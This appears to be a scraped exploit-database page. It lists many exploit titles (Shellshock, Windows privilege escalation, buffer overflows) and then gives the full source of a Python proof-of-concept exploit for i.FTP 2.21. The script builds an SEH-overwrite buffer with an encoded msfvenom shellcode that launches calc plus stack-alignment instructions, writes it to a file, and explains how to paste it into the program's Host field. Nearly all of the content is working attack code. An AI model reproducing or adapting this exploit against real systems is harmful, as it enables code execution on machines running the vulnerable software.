01664c67b8
11 new exploits JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7 JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7 BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7 BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass) Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass) Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass) RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass) RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass) UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass) UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass) The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass) The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass) Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7) QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS GNU Bash - Environment Variable Command Injection (ShellShock) Bash - Environment Variables Code Injection Exploit (ShellShock) GNU Bash - Environment Variable Command Injection (Shellshock) Bash - Environment Variables Code Injection Exploit (Shellshock) OpenVPN 2.2.29 - ShellShock Exploit OpenVPN 2.2.29 - Shellshock Exploit Bash - CGI RCE Shellshock Exploit (Metasploit) Bash CGI - RCE Shellshock Exploit (Metasploit) PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions) PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit) OSSEC 2.8 - Privilege Escalation OSSEC 2.8 - hosts.deny Privilege Escalation ShellShock dhclient Bash Environment Variable Command Injection PoC dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock) OSSEC 2.7 <= 2.8.1 - Local Root Escalation OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2 Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2) BigTree CMS Cross Site Request Forgery Vulnerability Advantech Switch Bash Environment Variable Code Injection (Shellshock) Advantech Switch - Bash Environment Variable Code Injection (Shellshock) KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7) KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10) KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7) KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10) Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes Ajaxel CMS 8.0 - Multiple Vulnerabilities i.FTP 2.21 - Host Address / URL Field SEH Exploit Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution ZeewaysCMS - Multiple Vulnerabilities ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2) RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC ImageMagick Delegate Arbitrary Command Execution Ruby on Rails Development Web Console (v2) Code Execution
70 lines
No EOL
3.5 KiB
Python
Executable file
70 lines
No EOL
3.5 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit
|
|
# Date: 3-5-2016
|
|
# Exploit Author: Tantaryu MING
|
|
# Vendor Homepage: http://www.memecode.com/iftp.php
|
|
# Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
|
|
# Version: 2.21
|
|
# Tested on: Windows 7 SP1 x86_64
|
|
|
|
|
|
# How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button
|
|
|
|
'''
|
|
msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b '\x00\x0d\x20\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferREgister=EAX
|
|
'''
|
|
shellcode = (
|
|
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
|
|
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
|
|
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
|
|
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
|
|
"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x43\x30\x33\x50\x4d\x59"
|
|
"\x4a\x45\x36\x51\x39\x50\x42\x44\x4c\x4b\x30\x50\x56\x50\x4c"
|
|
"\x4b\x51\x42\x34\x4c\x4c\x4b\x30\x52\x35\x44\x4c\x4b\x42\x52"
|
|
"\x31\x38\x44\x4f\x58\x37\x51\x5a\x57\x56\x30\x31\x4b\x4f\x4e"
|
|
"\x4c\x47\x4c\x35\x31\x43\x4c\x53\x32\x56\x4c\x51\x30\x59\x51"
|
|
"\x58\x4f\x34\x4d\x53\x31\x49\x57\x4b\x52\x4a\x52\x50\x52\x50"
|
|
"\x57\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x50\x4a\x37\x4c\x4c\x4b"
|
|
"\x30\x4c\x54\x51\x52\x58\x4b\x53\x50\x48\x35\x51\x38\x51\x50"
|
|
"\x51\x4c\x4b\x31\x49\x47\x50\x33\x31\x48\x53\x4c\x4b\x51\x59"
|
|
"\x32\x38\x4d\x33\x47\x4a\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x35"
|
|
"\x51\x59\x46\x56\x51\x4b\x4f\x4e\x4c\x59\x51\x48\x4f\x54\x4d"
|
|
"\x45\x51\x58\x47\x57\x48\x4d\x30\x33\x45\x4a\x56\x55\x53\x53"
|
|
"\x4d\x4c\x38\x57\x4b\x33\x4d\x47\x54\x52\x55\x4b\x54\x30\x58"
|
|
"\x4c\x4b\x31\x48\x36\x44\x43\x31\x59\x43\x43\x56\x4c\x4b\x44"
|
|
"\x4c\x50\x4b\x4c\x4b\x46\x38\x35\x4c\x45\x51\x4e\x33\x4c\x4b"
|
|
"\x34\x44\x4c\x4b\x45\x51\x58\x50\x4b\x39\x51\x54\x36\x44\x57"
|
|
"\x54\x51\x4b\x31\x4b\x33\x51\x36\x39\x51\x4a\x30\x51\x4b\x4f"
|
|
"\x4b\x50\x51\x4f\x31\x4f\x30\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
|
|
"\x4d\x51\x4d\x33\x5a\x55\x51\x4c\x4d\x4d\x55\x58\x32\x35\x50"
|
|
"\x45\x50\x45\x50\x56\x30\x33\x58\x30\x31\x4c\x4b\x42\x4f\x4d"
|
|
"\x57\x4b\x4f\x38\x55\x4f\x4b\x4a\x50\x4e\x55\x39\x32\x50\x56"
|
|
"\x52\x48\x59\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x37"
|
|
"\x4c\x35\x56\x33\x4c\x44\x4a\x4d\x50\x4b\x4b\x4b\x50\x42\x55"
|
|
"\x33\x35\x4f\x4b\x37\x37\x55\x43\x53\x42\x52\x4f\x53\x5a\x33"
|
|
"\x30\x46\x33\x4b\x4f\x39\x45\x53\x53\x45\x31\x52\x4c\x35\x33"
|
|
"\x35\x50\x41\x41"
|
|
)
|
|
|
|
eax_zeroed = '\x25\x2E\x2E\x2E\x2E'
|
|
eax_zeroed += '\x25\x11\x11\x11\x11'
|
|
|
|
align_to_eax = "\x54\x58" # Get ESP and pop it into EAX
|
|
align_to_eax += "\x2d\x7d\x7d\x7d\x7d" # SUB EAX, 0x7d7d7d7d
|
|
align_to_eax += "\x2d\x01\x01\x01\x01" # SUB EAX, 0x01010101
|
|
align_to_eax += "\x2d\x01\x01\x02\x02" # SUB EAX, 0x02020101
|
|
align_to_eax += "\x2d\x7c\x73\x7f\x7f" # SUB EAX, 0x7f7f737c
|
|
|
|
buffer = "\x41" * 1865
|
|
buffer += "\x42\x42\x71\x04" # Pointer to Next SEH Record
|
|
buffer += "\x78\x2a\x01\x10" # SEH HANDLER
|
|
buffer += eax_zeroed
|
|
buffer += align_to_eax
|
|
buffer += "\x43" * 5
|
|
buffer += shellcode
|
|
buffer += "E" * 4
|
|
|
|
f = open('exploit.txt', "wb")
|
|
f.write(buffer)
|
|
f.close() |